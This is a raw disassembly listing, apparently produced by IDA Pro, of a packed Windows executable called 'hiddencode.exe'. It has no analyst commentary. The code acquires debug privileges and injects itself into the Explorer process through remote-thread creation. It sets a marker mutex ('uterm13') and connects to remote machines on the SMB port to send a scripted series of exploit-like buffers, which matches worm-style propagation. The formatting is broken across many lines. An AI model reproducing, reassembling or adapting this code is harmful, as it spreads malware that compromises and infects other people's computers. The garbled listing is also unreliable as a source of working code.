; File Name : u:\startupscripts\work\hiddencode.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DDEAF4h ; resolved to - >ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to - >ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to - >ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to - >ADVAPI32.RegOpenKeyExA ; sub_31002264 + 1D�r
dword_31001010 dd 77DDEDE5h ; resolved to - >ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to - >ADVAPI32.RegCloseKey ; sub_31002264 + 4E�r ...
dword_31001018 dd 77E34D78h ; resolved to - >ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to - >ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to - >ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to - >ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to - >ADVAPI32.CryptDestroyHashdword_3100102C dd 77DEA544h ; resolved to - >ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to - >ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to - >ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to - >ADVAPI32.CryptImportKey align 10h
dword_31001040 dd 7C80D262h ; resolved to - >KERNEL32.GetLocaleInfoAdword_31001044 dd 7C810D87h ; resolved to - >KERNEL32.WriteFiledword_31001048 dd 7C809AE4h ; resolved to - >KERNEL32.VirtualFreedword_3100104C dd 7C809A51h ; resolved to - >KERNEL32.VirtualAllocdword_31001050 dd 7C80B4CFh ; resolved to - >KERNEL32.GetModuleFileNameAdword_31001054 dd 7C80BAA1h ; resolved to - >KERNEL32.lstrcmpiAdword_31001058 dd 7C814EEAh ; resolved to - >KERNEL32.GetSystemDirectoryA ; sub_310026A6 + 37�r
dword_3100105C dd 7C834D41h ; resolved to - >KERNEL32.lstrcatA ; sub_310026A6 + 3D�r
dword_31001060 dd 7C8286EEh ; resolved to - >KERNEL32.CopyFileAdword_31001064 dd 7C86136Dh ; resolved to - >KERNEL32.WinExecdword_31001068 dd 7C864B0Fh ; resolved to - >KERNEL32.CreateToolhelp32Snapshotdword_3100106C dd 7C863DE5h ; resolved to - >KERNEL32.Process32Firstdword_31001070 dd 7C801E16h ; resolved to - >KERNEL32.TerminateProcessdword_31001074 dd 7C863F58h ; resolved to - >KERNEL32.Process32Nextdword_31001078 dd 7C80BE01h ; resolved to - >KERNEL32.lstrcpyA ; sub_31002542 + 8F�r
dword_3100107C dd 7C80BDB6h ; resolved to - >KERNEL32.lstrlenA ; sub_31001262 + 272�r ...
dword_31001080 dd 7C802442h ; resolved to - >KERNEL32.Sleep ; sub_31001ADF + E2�r ...
dword_31001084 dd 7C810111h ; resolved to - >KERNEL32.lstrcpynAdword_31001088 dd 7C80DDF5h ; resolved to - >KERNEL32.GetCurrentProcessdword_3100108C dd 7C80ADA0h ; resolved to - >KERNEL32.GetProcAddress ; sub_31001851 + 2C�r
dword_31001090 dd 7C801D77h ; resolved to - >KERNEL32.LoadLibraryA ; sub_31001E06 + A4�r
dword_31001094 dd 7C80220Fh ; resolved to - >KERNEL32.WriteProcessMemorydword_31001098 dd 7C809B47h ; resolved to - >KERNEL32.CloseHandle ; sub_310019B3 + 19�r ...
dword_3100109C dd 7C8309E1h ; resolved to - >KERNEL32.OpenProcess ; sub_31002310 + 92�r
dword_310010A0 dd 7C80B6A1h ; resolved to - >KERNEL32.GetModuleHandleA ; UPX0:31001D8A�r
dword_310010A4 dd 7C80929Ch ; resolved to - >KERNEL32.GetTickCountdword_310010A8 dd 7C80E93Fh ; resolved to - >KERNEL32.CreateMutexAdword_310010AC dd 7C810637h ; resolved to - >KERNEL32.CreateThread ; sub_310019B3 + 12�r
dword_310010B0 dd 7C802367h ; resolved to - >KERNEL32.CreateProcessAdword_310010B4 dd 7C80A017h ; resolved to - >KERNEL32.SetEventdword_310010B8 dd 7C81320Ch ; resolved to - >KERNEL32.OpenEventAdword_310010BC dd 7C80C058h ; resolved to - >KERNEL32.ExitThread ; sub_31001C18 + 66�r ...
dword_310010C0 dd 7C80180Eh ; resolved to - >KERNEL32.ReadFiledword_310010C4 dd 7C810A77h ; resolved to - >KERNEL32.GetFileSizedword_310010C8 dd 7C801A24h ; resolved to - >KERNEL32.CreateFileA ; sub_310026A6 + 8F�r
dword_310010CC dd 7C81CDDAh ; resolved to - >KERNEL32.ExitProcess ; sub_31002476 + C3�r
dword_310010D0 dd 7C910331h ; resolved to - >NTDLL.RtlGetLastWin32Errordword_310010D4 dd 7C831EABh ; resolved to - >KERNEL32.DeleteFileA ; sub_31002476 + F�r
dword_310010D8 dd 7C802520h ; resolved to - >KERNEL32.WaitForSingleObjectdword_310010DC dd 7C8308ADh ; resolved to - >KERNEL32.CreateEventAdword_310010E0 dd 7C809766h ; resolved to - >KERNEL32.InterlockedIncrement ; sub_3100202D + 58�r
align 8
dword_310010E8 dd 77C46EB0h ; resolved to - >MSVCRT.memcmpdword_310010EC dd 77C47660h ; resolved to - >MSVCRT.strchr ; sub_31002928 + 68�r
; ---------------------------------------------------------------------------
loc_310010F0: ; DATA XREF: UPX0:loc_31002BD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
dword_310010F4 dd 77C47C60h ; resolved to - >MSVCRT.strstr ; sub_31002310 + 79�r ...
dword_310010F8 dd 77C371D3h ; resolved to - >MSVCRT.rand ; sub_31001AC9 + 1�r ...
dword_310010FC dd 77C371BCh ; resolved to - >MSVCRT.sranddword_31001100 dd 77C46F70h ; resolved to - >MSVCRT.memcpydword_31001104 dd 77C478A0h ; resolved to - >MSVCRT.strlendword_31001108 dd 77C475F0h ; resolved to - >MSVCRT.memset align 10h
dword_31001110 dd 7E42DE87h ; resolved to - >USER32.FindWindowAdword_31001114 dd 7E41BE4Bh ; resolved to - >USER32.GetForegroundWindowdword_31001118 dd 7E418A80h ; resolved to - >USER32.GetWindowThreadProcessIddword_3100111C dd 7E41A8ADh ; resolved to - >USER32.wsprintfA ; sub_31001ADF + 8B�r ...
dd 0
dword_31001124 dd 42C2ABF4h ; resolved to - >WININET.InternetReadFile ; sub_31002A44 + B3�r
dword_31001128 dd 42C30BFAh ; resolved to - >WININET.InternetOpenUrlA ; sub_31002A44 + 9E�r
dword_3100112C dd 42C2C8A1h ; resolved to - >WININET.InternetOpenA ; sub_31002A44 + 89�r
dword_31001130 dd 42C1DAC1h ; resolved to - >WININET.InternetCloseHandledword_31001134 dd 42C367F6h ; resolved to - >WININET.InternetGetConnectedState ; UPX0:31002184�r
dd 0
dword_3100113C dd 71AB664Dh ; resolved to - >WS2_32.WSAStartupdword_31001140 dd 71AB3E00h ; resolved to - >WS2_32.binddword_31001144 dd 71AB88D3h ; resolved to - >WS2_32.listendword_31001148 dd 71AC1028h ; resolved to - >WS2_32.acceptdword_3100114C dd 71AB50C8h ; resolved to - >WS2_32.gethostnamedword_31001150 dd 71AB94DCh ; resolved to - >WS2_32.WSAGetLastErrordword_31001154 dd 71AB4FD4h ; resolved to - >WS2_32.gethostbynamedword_31001158 dd 71AB3B91h ; resolved to - >WS2_32.socket ; sub_31001C18 + AC�r
dword_3100115C dd 71AB3F41h ; resolved to - >WS2_32.inet_ntoa ; sub_310020F4 + D�r
dword_31001160 dd 71AB2B66h ; resolved to - >WS2_32.ntohs ; sub_31001C18 + F0�r
dword_31001164 dd 71AB406Ah ; resolved to - >WS2_32.connectdword_31001168 dd 71AB428Ah ; resolved to - >WS2_32.send ; sub_31001ADF + 67�r ...
dword_3100116C dd 71AB615Ah ; resolved to - >WS2_32.recv ; sub_31001262 + 1D8�r ...
dword_31001170 dd 71AC0BDEh ; resolved to - >WS2_32.shutdown ; sub_31001ADF + 11B�r
dword_31001174 dd 71AB9639h ; resolved to - >WS2_32.closesocket ; sub_31001ADF + 122�r
align 10h
dword_31001180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
sub_31001190 proc near ; CODE XREF: sub_31002928
+ BF
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr
0Ch
push ebx
mov ebx, [ esp
+ 4
+ arg_0 ]
push esi
mov esi, dword_31001034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ;
dword_31001034
test eax, eax
jnz short
loc_310011BD
push 8
push 1
push edi
push edi
push ebx
call esi ;
dword_31001034
test eax, eax
jnz short
loc_310011BD
push 1
pop eax
jmp short
loc_310011DB
; ---------------------------------------------------------------------------
loc_310011BD: ; CODE XREF: sub_31001190
+ 19
; sub_31001190
+ 26
lea eax, [ ebx
+ 4 ]
push eax
push edi
push edi
push [ esp
+ 18h + arg_8 ]
push [ esp
+ 1Ch + arg_4 ]
push dword ptr [ ebx ]
call dword_31001038 ;
CryptImportKey
neg eax
sbb eax, eax
and al,
0FEh
inc eax
inc eax
loc_310011DB: ; CODE XREF: sub_31001190
+ 2B
pop edi
pop esi
pop ebx
retn
sub_31001190 endp
sub_310011DF proc near ; CODE XREF: sub_31002928
+ 10F
arg_0 = dword ptr 4
push esi
mov esi, [ esp
+ 4
+ arg_0 ]
push dword ptr [ esi
+ 4 ]
call dword_3100102C ;
CryptDestroyKey
push 0
push dword ptr [ esi ]
call dword_31001030 ;
CryptReleaseContext
xor eax, eax
pop esi
retn
sub_310011DF endp
sub_310011FB proc near ; CODE XREF: sub_31002928
+ EA
arg_0 = dword ptr 8
arg_4 = dword ptr
0Ch
arg_8 = dword ptr
10h
arg_C = dword ptr
14h
arg_10 = dword ptr
18h
arg_14 = dword ptr
1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ ebp
+ arg_0 ]
push edi
lea eax, [ ebp
+ arg_0 ]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [ esi ]
call dword_3100101C ;
CryptCreateHash
test eax, eax
jnz short
loc_31001221
push 1
pop eax
jmp short
loc_3100125E
; ---------------------------------------------------------------------------
loc_31001221: ; CODE XREF: sub_310011FB
+ 1F
push edi
push [ ebp
+ arg_8 ]
push [ ebp
+ arg_4 ]
push [ ebp
+ arg_0 ]
call dword_31001020 ;
CryptHashData
test eax, eax
jnz short
loc_3100123A
push 2
pop edi
jmp short
loc_31001253
; ---------------------------------------------------------------------------
loc_3100123A: ; CODE XREF: sub_310011FB
+ 38
push edi
push edi
push dword ptr [ esi
+ 4 ]
push [ ebp
+ arg_10 ]
push [ ebp
+ arg_C ]
push [ ebp
+ arg_0 ]
call dword_31001024 ;
CryptVerifySignatureA
mov ecx, [ ebp
+ arg_14 ]
mov [ ecx ], eax
loc_31001253: ; CODE XREF: sub_310011FB
+ 3D
push [ ebp
+ arg_0 ]
call dword_31001028 ;
CryptDestroyHash
mov eax, edi
loc_3100125E: ; CODE XREF: sub_310011FB
+ 24
pop edi
pop esi
pop ebp
retn
sub_310011FB endp
sub_31001262 proc near ; CODE XREF: sub_31001F41
+ 36
; sub_31001FA5
+ 48 ...
var_89E4 = byte ptr
- 89E4h
var_897C = byte ptr
- 897Ch
var_690C = byte ptr
- 690Ch
var_689C = byte ptr
- 689Ch
var_5DD8 = byte ptr
- 5DD8h
var_4834 = byte ptr
- 4834h
var_4833 = byte ptr
- 4833h
var_37A0 = byte ptr
- 37A0h
var_2CDC = byte ptr
- 2CDCh
var_2CDB = byte ptr
- 2CDBh
var_2CD8 = byte ptr
- 2CD8h
var_24F4 = byte ptr
- 24F4h
var_24E4 = byte ptr
- 24E4h
var_21C0 = byte ptr
- 21C0h
var_21BC = byte ptr
- 21BCh
var_21B0 = byte ptr
- 21B0h
var_1F28 = byte ptr
- 1F28h
var_1EAC = byte ptr
- 1EACh
var_16DC = byte ptr
- 16DCh
var_1231 = byte ptr
- 1231h
var_F44 = byte ptr
- 0F44h
var_EA4 = byte ptr
- 0EA4h
var_798 = dword ptr
- 798h
var_788 = byte ptr
- 788h
var_774 = byte ptr
- 774h
var_730 = byte ptr
- 730h
var_134 = byte ptr
- 134h
var_133 = byte ptr
- 133h
var_E4 = byte ptr
- 0E4h
var_E1 = byte ptr
- 0E1h
var_B7 = byte ptr
- 0B7h
var_B5 = byte ptr
- 0B5h
var_B4 = byte ptr
- 0B4h
var_6C = byte ptr
- 6Ch
var_4C = byte ptr
- 4Ch
var_24 = word ptr
- 24h
var_22 = word ptr
- 22h
var_20 = dword ptr
- 20h
var_14 = dword ptr
- 14h
var_10 = dword ptr
- 10h
var_C = dword ptr
- 0Ch
var_6 = byte ptr
- 6
var_5 = byte ptr
- 5
var_4 = dword ptr
- 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax,
89E4h
call sub_31002BA0
mov eax, dword_310049CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ ebp
+ var_14 ], eax
mov eax, dword_310049D0
push ebx
push edi
push 2
mov [ ebp
+ var_10 ], eax
mov [ ebp
+ var_C ], edi
call dword_31001158 ;
socket
cmp eax,
0FFFFFFFFh
mov [ ebp
+ var_4 ], eax
jz loc_310017C2
push esi
mov esi, [ ebp
+ arg_0 ]
push 1Dh
push esi
call dword_3100115C ;
inet_ntoa
push eax
lea eax, [ ebp
+ var_6C ]
push eax
call dword_31001084 ;
lstrcpynA
lea eax, [ ebp
+ var_6C ]
push eax
lea eax, [ ebp
+ var_4C ]
push offset loc_310049C0
push eax
call dword_3100111C ;
wsprintfA
add esp,
0Ch
xor ecx, ecx
lea eax, [ ebp
+ var_133 ]
loc_310012D5: ; CODE XREF: sub_31001262
+ 83
mov dl, [ ebp
+ ecx
+ var_4C ]
mov [ eax
- 1 ], dl
and byte ptr [ eax ], 0
inc ecx
inc eax
inc eax
cmp ecx,
28h
jl short
loc_310012D5
push 60h
lea eax, [ ebp
+ var_E4 ]
push offset dword_310044E0
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp
+ var_4C ]
push eax
call sub_31002B92 ; strlen
shl eax, 1
push eax
lea eax, [ ebp
+ var_134 ]
push eax
lea eax, [ ebp
+ var_B4 ]
push eax
call sub_31002B98 ; memcpy
add esp,
1Ch
lea eax, [ ebp
+ var_4C ]
push 9
push (
offset aC
+ 3)
push eax
call sub_31002B92 ; strlen
pop ecx
lea eax, [ ebp
+ eax
* 2
+ var_B5 ]
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp
+ var_4C ]
push eax
call sub_31002B92 ; strlen
add al,
1Ah
push edi
shl al, 1
mov [ ebp
+ var_5 ], al
lea eax, [ ebp
+ var_5 ]
push eax
lea eax, [ ebp
+ var_E1 ]
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp
+ var_4C ]
push eax
call sub_31002B92 ; strlen
shl al, 1
add al, 9
push edi
mov [ ebp
+ var_6 ], al
lea eax, [ ebp
+ var_6 ]
push eax
lea eax, [ ebp
+ var_B7 ]
push eax
call sub_31002B98 ; memcpy
push 0E29h
lea eax, [ ebp
+ var_1F28 ]
push 31h
push eax
call sub_31002B8C ; memset
push 10h
lea eax, [ ebp
+ var_24 ]
push ebx
push eax
call sub_31002B8C ; memset
add esp,
44h
mov [ ebp
+ var_24 ], 2
push 1BDh
call dword_31001160 ;
ntohs
mov [ ebp
+ var_22 ], ax
lea eax, [ ebp
+ var_24 ]
push 10h
push eax
push [ ebp
+ var_4 ]
mov [ ebp
+ var_20 ], esi
call dword_31001164 ;
connect
cmp eax,
0FFFFFFFFh
jz loc_310017B8
mov esi, dword_31001080
mov edi,
0C8h
push edi
call esi ;
dword_31001080
push ebx
mov ebx, dword_31001168
push 89h
push offset dword_310042C8
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
push 0
push 0A8h
push offset dword_31004354
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
push 0
push 0DEh
push offset dword_31004400
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
cmp eax,
46h
jl loc_310017AD
cmp [ ebp
+ var_730 ],
31h
jnz loc_31001658
and [ ebp
+ arg_0 ], 0
push 7D0h
lea eax, [ ebp
+ var_F44 ]
push 90h
push eax
call sub_31002B8C ; memset
add esp,
0Ch
push offset byte_31004000
call dword_3100107C ;
lstrlenA
push eax
lea eax, [ ebp
+ var_EA4 ]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp,
0Ch
lea eax, [ ebp
+ var_14 ]
push eax
call dword_3100107C ;
lstrlenA
push eax
lea eax, [ ebp
+ var_14 ]
push eax
lea eax, [ ebp
+ var_788 ]
push eax
call sub_31002B98 ; memcpy
mov eax, dword_31004906
add esp,
0Ch
mov [ ebp
+ var_798 ], eax
loc_310014F9: ; CODE XREF: sub_31001262
+ 4E1
movsx eax, [ ebp
+ var_5 ]
add eax, 4
push 0
push eax
lea eax, [ ebp
+ var_E4 ]
push eax
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
push 0
push 68h
push offset dword_31004544
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
push 0
push 0A0h
push offset dword_310045B0
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
cmp [ ebp
+ arg_0 ], 0
jz loc_31001748
push 68h
lea eax, [ ebp
+ var_89E4 ]
push offset dword_31004768
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp
+ var_4834 ]
push 1B5Ah
push eax
lea eax, [ ebp
+ var_897C ]
push eax
call sub_31002B98 ; memcpy
push 70h
lea eax, [ ebp
+ var_690C ]
push offset dword_310047D4
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp
+ var_37A0 ]
push 0A5Eh
push eax
lea eax, [ ebp
+ var_689C ]
push eax
call sub_31002B98 ; memcpy
push 84h
lea eax, [ ebp
+ var_5DD8 ]
push offset dword_31004848
push eax
call sub_31002B98 ; memcpy
add esp,
3Ch
lea eax, [ ebp
+ var_89E4 ]
push 0
push 10FCh
push eax
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
push 0
lea eax, [ ebp
+ var_774 ]
push 640h
push eax
push [ ebp
+ var_4 ]
call dword_3100116C ;
recv
cmp eax,
0FFFFFFFFh
jz loc_310017AD
push 0
push 0FDCh
lea eax, [ ebp
+ var_690C ]
jmp loc_310017A0
; ---------------------------------------------------------------------------
loc_31001658: ; CODE XREF: sub_31001262
+ 22B
push 0DACh
lea eax, [ ebp
+ var_2CD8 ]
push 90h
push eax
mov [ ebp
+ arg_0 ], 1
call sub_31002B8C ; memset
push 4
lea eax, [ ebp
+ var_24F4 ]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ ebp
+ var_24E4 ]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ ebp
+ var_21C0 ]
push offset loc_310049B8
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ ebp
+ var_21BC ]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
add esp,
40h
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ ebp
+ var_21B0 ]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp,
10h
xor ecx, ecx
lea eax, [ ebp
+ var_4833 ]
loc_310016F4: ; CODE XREF: sub_31001262
+ 4A8
mov dl, [ ebp
+ ecx
+ var_2CD8 ]
mov [ eax
- 1 ], dl
and byte ptr [ eax ], 0
inc ecx
inc eax
inc eax
cmp ecx,
0DACh
jl short
loc_310016F4
and [ ebp
+ var_2CDC ], 0
and [ ebp
+ var_2CDB ], 0
push 1C52h
lea eax, [ ebp
+ var_89E4 ]
push 31h
push eax
call sub_31002B8C ; memset
push 1C52h
lea eax, [ ebp
+ var_690C ]
push 31h
push eax
call sub_31002B8C ; memset
add esp,
18h
jmp loc_310014F9
; ---------------------------------------------------------------------------
loc_31001748: ; CODE XREF: sub_31001262
+ 339
push 7Ch
lea eax, [ ebp
+ var_1F28 ]
push offset dword_31004654
push eax
call sub_31002B98 ; memcpy
lea eax, [ ebp
+ var_F44 ]
push 7D0h
push eax
lea eax, [ ebp
+ var_1EAC ]
push eax
call sub_31002B98 ; memcpy
push 90h
lea eax, [ ebp
+ var_16DC ]
push offset dword_310046D4
push eax
call sub_31002B98 ; memcpy
add esp,
24h
and [ ebp
+ var_1231 ], 0
lea eax, [ ebp
+ var_1F28 ]
push 0
push 0CF8h
loc_310017A0: ; CODE XREF: sub_31001262
+ 3F1
push eax
push [ ebp
+ var_4 ]
call ebx ;
dword_31001168
push edi
call esi ;
dword_31001080
and [ ebp
+ var_C ], 0
loc_310017AD: ; CODE XREF: sub_31001262
+ 1AD
; sub_31001262
+ 1E1 ...
push 2
push [ ebp
+ var_4 ]
call dword_31001170 ;
shutdown
loc_310017B8: ; CODE XREF: sub_31001262
+ 166
push [ ebp
+ var_4 ]
call dword_31001174 ;
closesocket
pop esi
loc_310017C2: ; CODE XREF: sub_31001262
+ 37
mov eax, [ ebp
+ var_C ]
pop edi
pop ebx
leave
retn
sub_31001262 endp
sub_310017C9 proc near ; CODE XREF: UPX0:loc_31001DCA
var_1C = dword ptr
- 1Ch
var_18 = byte ptr
- 18h
var_10 = dword ptr
- 10h
var_C = dword ptr
- 0Ch
var_8 = dword ptr
- 8
var_4 = dword ptr
- 4
push ebp
mov ebp, esp
sub esp,
1Ch
push esi
push edi
push offset aAdvapi32 ; \"advapi32\"
call dword_31001090 ;
LoadLibraryA
mov esi, dword_3100108C
mov edi, eax
push offset aOpenprocesstok ; \"OpenProcessToken\"
push edi
call esi ;
dword_3100108C
test eax, eax
mov [ ebp
+ var_4 ], eax
jz short
loc_3100184D
push offset aLookupprivileg ; \"LookupPrivilegeValueA\"
push edi
call esi ;
dword_3100108C
test eax, eax
mov [ ebp
+ var_8 ], eax
jz short
loc_3100184D
push offset aAdjusttokenpri ; \"AdjustTokenPrivileges\"
push edi
call esi ;
dword_3100108C
mov esi, eax
test esi, esi
jz short
loc_3100184D
lea eax, [ ebp
+ var_C ]
push eax
push 20h
call dword_31001088 ;
GetCurrentProcess
push eax
call + var_4 ]>[ ebp + var_4 ]
lea eax, [ ebp
+ var_18 ]
mov [ ebp
+ var_1C ], 1
push eax
push offset aSedebugprivile ; \"SeDebugPrivilege\"
push 0
mov [ ebp
+ var_10 ], 2
call + var_8 ]>[ ebp + var_8 ]
push 0
push 0
lea eax, [ ebp
+ var_1C ]
push 10h
push eax
push 0
push [ ebp
+ var_C ]
call esi ;
GetProcAddress
loc_3100184D: ; CODE XREF: sub_310017C9
+ 28
; sub_310017C9
+ 37 ...
pop edi
pop esi
leave
retn
sub_310017C9 endp
sub_31001851 proc near ; CODE XREF: UPX0:31001DDE
var_18 = byte ptr
- 18h
var_14 = dword ptr
- 14h
var_10 = dword ptr
- 10h
var_C = dword ptr
- 0Ch
var_8 = dword ptr
- 8
var_4 = dword ptr
- 4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp,
18h
mov ecx, dword_31004FD0
and [ ebp
+ var_4 ], 0
push ebx
push esi
mov eax, [ ecx
+ 3Ch ]
push edi
add eax, ecx
push offset aKernel32 ; \"kernel32\"
mov ecx, [ eax
+ 34h ]
mov edi, [ eax
+ 50h ]
mov [ ebp
+ var_C ], ecx
call dword_310010A0 ;
GetModuleHandleA
mov esi, dword_3100108C
mov ebx, eax
push offset aVirtualallocex ; \"VirtualAllocEx\"
push ebx
call esi ;
dword_3100108C
test eax, eax
mov [ ebp
+ var_10 ], eax
jnz short
loc_31001898
loc_31001894: ; CODE XREF: sub_31001851
+ 54
push 1
jmp short
loc_310018E9
; ---------------------------------------------------------------------------
loc_31001898: ; CODE XREF: sub_31001851
+ 41
push offset aCreateremoteth ; \"CreateRemoteThread\"
push ebx
call esi ;
dword_3100108C
test eax, eax
mov [ ebp
+ var_14 ], eax
jz short
loc_31001894
push 0
push offset aShell_traywnd ; \"Shell_TrayWnd\"
call dword_31001110 ;
FindWindowA
test eax, eax
jnz short
loc_310018C6
call dword_31001114 ;
GetForegroundWindow
test eax, eax
jnz short
loc_310018C6
push 2
jmp short
loc_310018E9
; ---------------------------------------------------------------------------
loc_310018C6: ; CODE XREF: sub_31001851
+ 65
; sub_31001851
+ 6F
lea ecx, [ ebp
+ var_8 ]
push ecx
push eax
call dword_31001118 ;
GetWindowThreadProcessId
push [ ebp
+ var_8 ]
push 0
push 42Ah
call dword_3100109C ;
OpenProcess
mov ebx, eax
test ebx, ebx
jnz short
loc_310018EC
push 3
loc_310018E9: ; CODE XREF: sub_31001851
+ 45
; sub_31001851
+ 73
pop eax
jmp short
loc_31001957
; ---------------------------------------------------------------------------
loc_310018EC: ; CODE XREF: sub_31001851
+ 94
push 4
push 3000h
push edi
push [ ebp
+ var_C ]
push ebx
call + var_10 ]>[ ebp + var_10 ]
mov esi, dword_31001098
test eax, eax
jz short
loc_3100194A
lea ecx, [ ebp
+ var_10 ]
push ecx
push edi
push eax
push eax
push ebx
call dword_31001094 ;
WriteProcessMemory
push dword_31004FC4
call esi ;
dword_31001098
lea eax, [ ebp
+ var_18 ]
xor edi, edi
push eax
push edi
push 1
push [ ebp
+ arg_0 ]
push edi
push edi
push ebx
call + var_14 ]>[ ebp + var_14 ]
cmp eax, edi
jz short
loc_31001936
push eax
call esi ;
dword_31001098
jmp short
loc_31001951
; ---------------------------------------------------------------------------
loc_31001936: ; CODE XREF: sub_31001851
+ DE
push offset aUterm13 ; \"uterm13\"
call sub_3100198A
pop ecx
mov [ ebp
+ var_4 ], 5
jmp short
loc_31001951
; ---------------------------------------------------------------------------
loc_3100194A: ; CODE XREF: sub_31001851
+ B2
mov [ ebp
+ var_4 ], 4
loc_31001951: ; CODE XREF: sub_31001851
+ E3
; sub_31001851
+ F7
push ebx
call esi ;
dword_31001098
mov eax, [ ebp
+ var_4 ]
loc_31001957: ; CODE XREF: sub_31001851
+ 99
pop edi
pop esi
pop ebx
leave
retn
sub_31001851 endp
sub_3100195C proc near ; CODE XREF: sub_31001C18
+ B
; UPX0:31001DA0 ...
var_8 = dword ptr
- 8
var_4 = dword ptr
- 4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ ebp
+ var_8 ], eax
popa
mov [ ebp
+ var_4 ], esp
call dword_310010A4 ;
GetTickCount
mov ecx, [ ebp
+ var_4 ]
imul ecx, [ ebp
+ var_8 ]
add eax, ecx
push eax
call dword_310010FC ;
srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3100195C endp
sub_3100198A proc near ; CODE XREF: sub_31001851
+ EA
; UPX0:31001DAA ...
arg_0 = dword ptr 4
push [ esp
+ arg_0 ]
push 1
push 0
call dword_310010A8 ;
CreateMutexA
retn
sub_3100198A endp
sub_31001999 proc near ; CODE XREF: sub_31001E06
+ E3
; sub_31001E06
+ EE ...
arg_0 = dword ptr 8
arg_4 = dword ptr
0Ch
push ebp
mov ebp, esp
lea eax, [ ebp
+ arg_4 ]
push eax
xor eax, eax
push eax
push [ ebp
+ arg_4 ]
push [ ebp
+ arg_0 ]
push eax
push eax
call dword_310010AC ;
CreateThread
pop ebp
retn
sub_31001999 endp
sub_310019B3 proc near ; CODE XREF: sub_31001C18
+ 12C
; sub_31001FA5
+ 5A ...
arg_0 = dword ptr 8
arg_4 = dword ptr
0Ch
push ebp
mov ebp, esp
lea eax, [ ebp
+ arg_4 ]
push eax
xor eax, eax
push eax
push [ ebp
+ arg_4 ]
push [ ebp
+ arg_0 ]
push eax
push eax
call dword_310010AC ;
CreateThread
push eax
call dword_31001098 ;
CloseHandle
pop ebp
retn
sub_310019B3 endp
sub_310019D4 proc near ; CODE XREF: sub_31002476
+ 3B
; sub_31002542
+ 64 ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [ esp
+ 4
+ arg_0 ]
push esi
push edi
mov edi, [ esp
